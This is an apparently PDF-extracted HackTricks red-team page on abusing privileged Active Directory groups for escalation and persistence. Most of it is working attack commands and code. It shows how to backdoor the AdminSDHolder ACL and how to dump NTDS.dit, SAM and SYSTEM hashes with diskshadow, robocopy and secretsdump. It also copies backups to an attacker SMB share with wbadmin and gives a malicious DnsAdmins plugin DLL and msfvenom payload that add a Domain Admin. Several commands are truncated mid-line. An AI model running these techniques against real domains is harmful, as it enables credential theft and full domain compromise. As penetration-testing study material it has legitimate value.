Privileged Groups

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team
Expert)!

Well Known groups with administration

privileges
Administrators
Domain Admins
Enterprise Admins

Account Operators
This group is empowered to create accounts and groups that are not administrators on the
domain. Additionally, it enables local login to the Domain Controller (DC).
To identify the members of this group, the following command is executed:
Get-NetGroupMember -Identity "Account Operators" -Recurse

Adding new users is permitted, as well as local login to DC01.

AdminSDHolder group
The AdminSDHolder group's Access Control List (ACL) is crucial as it sets permissions for
all "protected groups" within Active Directory, including high-privilege groups. This
mechanism ensures the security of these groups by preventing unauthorized modifications.
An attacker could exploit this by modifying the AdminSDHolder group's ACL, granting full
permissions to a standard user. This would effectively give that user full control over all
protected groups. If this user's permissions are altered or removed, they would be
automatically reinstated within an hour due to the system's design.
Commands to review the members and modify permissions include:
Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=lo
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityRefere

A script is available to expedite the restoration process: Invoke-ADSDPropagation.ps1.

For more details, visit ired.team.

AD Recycle Bin
Membership in this group allows for the reading of deleted Active Directory objects, which
can reveal sensitive information:
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

Domain Controller Access

Access to files on the DC is restricted unless the user is part of the Server Operators
group, which changes the level of access.

Privilege Escalation
Using PsService or sc from Sysinternals, one can inspect and modify service
permissions. The Server Operators group, for instance, has full control over certain
services, allowing for the execution of arbitrary commands and privilege escalation:
C:\> .\PsService.exe security AppReadiness

This command reveals that Server Operators have full access, enabling the manipulation
of services for elevated privileges.

Backup Operators
Membership in the Backup Operators group provides access to the DC01 file system due
to the SeBackup and SeRestore privileges. These privileges enable folder traversal,
listing, and file copying capabilities, even without explicit permissions, using the
FILE_FLAG_BACKUP_SEMANTICS flag. Utilizing specific scripts is necessary for this process.

To list group members, execute:

Get-NetGroupMember -Identity "Backup Operators" -Recurse

Local Attack
To leverage these privileges locally, the following steps are employed:
1. Import necessary libraries:
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

2. Enable and verify SeBackupPrivilege :

Set-SeBackupPrivilege
Get-SeBackupPrivilege

3. Access HackTricks
and copy files from restricted directories, for instance:
HackTricks HackTricks Training Twitter
dir C:\Users\Administrator\
Copy-FileSeBackupPrivilege C:\Users\Administrator\report.pdf c:\temp\x.pdf -Overw
AD Attack
Direct access to the Domain Controller's file system allows for the theft of the NTDS.dit
database, which contains all NTLM hashes for domain users and computers.
Using diskshadow.exe
1. Create a shadow copy of the C drive:
diskshadow.exe
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
begin backup
add volume C: alias cdrive
create
expose %cdrive% F:
end backup
exit

2. Copy NTDS.dit from the shadow copy:

Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

Alternatively, use robocopy for file copying:

robocopy /B F:\Windows\NTDS .\ntds ntds.dit

3. Extract SYSTEM and SAM for hash retrieval:

reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV

4. Retrieve all hashes from NTDS.dit :

secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

Using wbadmin.exe
1. Set up NTFS filesystem for SMB server on attacker machine and cache SMB credentials
on the target machine.
2. Use wbadmin.exe for system backup and NTDS.dit extraction:
net use X: \\<AttackIP>\sharename /user:smbuser password
echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include
wbadmin get versions
echo "Y" | wbadmin start recovery -version:<date-time> -itemtype:file -items:c

For a practical demonstration, see DEMO VIDEO WITH IPPSEC.

DnsAdmins
Members of the DnsAdmins group can exploit their privileges to load an arbitrary DLL with
SYSTEM privileges on a DNS server, often hosted on Domain Controllers. This capability
allows for significant exploitation potential.
To list members of the DnsAdmins group, use:
Get-NetGroupMember -Identity "DnsAdmins" -Recurse

Execute arbitrary DLL

Members can make the DNS server load an arbitrary DLL (either locally or from a remote
share) using commands such as:
dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.d
dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-
An attacker could modify the DLL to add a user to the Domain Admins group or exe

// Modify DLL to add user

DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunct
{
system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /dom
system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /d
}
 // Generate DLL with msfvenom
msfvenom -p windows/x64/exec cmd='net group "domain admins" <username> /add /doma

Restarting the DNS service (which may require additional permissions) is necessary for the
DLL to be loaded:
sc.exe \\dc01 stop dns
sc.exe \\dc01 start dns

For more details on this attack vector, refer to ired.team.

Mimilib.dll
It's also feasible to use mimilib.dll for command execution, modifying it to execute specific
commands or reverse shells. Check this post for more information.

WPAD Record for MitM

DnsAdmins can manipulate DNS records to perform Man-in-the-Middle (MitM) attacks by
creating a WPAD record after disabling the global query block list. Tools like Responder or
Inveigh can be used for spoofing and capturing network traffic.
### Event Log Readers Members can access event logs, potentially finding sensitive
information such as plaintext passwords or command execution details:
# Get members and search logs for sensitive information
Get-NetGroupMember -Identity "Event Log Readers" -Recurse
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Va

Exchange Windows Permissions

This group can modify DACLs on the domain object, potentially granting DCSync privileges.
Techniques for privilege escalation exploiting this group are detailed in Exchange-AD-
Privesc GitHub repo.
 # List members
Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse

Hyper-V Administrators
Hyper-V Administrators have full access to Hyper-V, which can be exploited to gain control
over virtualized Domain Controllers. This includes cloning live DCs and extracting NTLM
hashes from the NTDS.dit file.

Exploitation Example
Firefox's Mozilla Maintenance Service can be exploited by Hyper-V Administrators to
execute commands as SYSTEM. This involves creating a hard link to a protected SYSTEM
file and replacing it with a malicious executable:
# Take ownership and start the service
takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice
sc.exe start MozillaMaintenance

Note: Hard link exploitation has been mitigated in recent Windows updates.

Organization Management
In environments where Microsoft Exchange is deployed, a special group known as
Organization Management holds significant capabilities. This group is privileged to access
the mailboxes of all domain users and maintains full control over the 'Microsoft Exchange
Security Groups' Organizational Unit (OU). This control includes the
Exchange Windows Permissions group, which can be exploited for privilege escalation.

Privilege Exploitation and Commands

Print Operators
Members of the Print Operators group are endowed with several privileges, including the
SeLoadDriverPrivilege , which allows them to log on locally to a Domain Controller, shut
it down, and manage printers. To exploit these privileges, especially if
SeLoadDriverPrivilege is not visible under an unelevated context, bypassing User
Account Control (UAC) is necessary.
To list the members of this group, the following PowerShell command is used:
Get-NetGroupMember -Identity "Print Operators" -Recurse

For more detailed exploitation techniques related to SeLoadDriverPrivilege , one should

consult specific security resources.
Remote Desktop Users
This group's members are granted access to PCs via Remote Desktop Protocol (RDP). To
enumerate these members, PowerShell commands are available:
Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Desktop Users

Further insights into exploiting RDP can be found in dedicated pentesting resources.
Remote Management Users
Members can access PCs over Windows Remote Management (WinRM). Enumeration of
these members is achieved through:
Get-NetGroupMember -Identity "Remote Management Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Management Use

For exploitation techniques related to WinRM, specific documentation should be consulted.

Server Operators
This group has permissions to perform various configurations on Domain Controllers,
including backup and restore privileges, changing system time, and shutting down the
system. To enumerate the members, the command provided is:
 Get-NetGroupMember -Identity "Server Operators" -Recurse

References
https://ired.team/offensive-security-experiments/active-directory-kerberos-
abuse/privileged-accounts-and-token-privileges
https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-
escalation/
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-
practices/appendix-b--privileged-accounts-and-groups-in-active-directory
https://docs.microsoft.com/en-us/windows/desktop/secauthz/enabling-and-disabling-
privileges-in-c--
https://adsecurity.org/?p=3658
http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-
escalation/
https://rastamouse.me/2019/01/gpo-abuse-part-1/
https://github.com/killswitch-GUI/HotLoad-
Driver/blob/master/NtLoadDriver/EXE/NtLoadDriver-C%2B%2B/ntloaddriver.cpp#L13
https://github.com/tandasat/ExploitCapcom
https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e
https://undocumented.ntinternals.net/index.html?
page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoa
dDriver.html
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team
Expert)!

Previous
 Force NTLM Privileged Authentication
Next
RDP Sessions Abuse
Last updated 3 months ago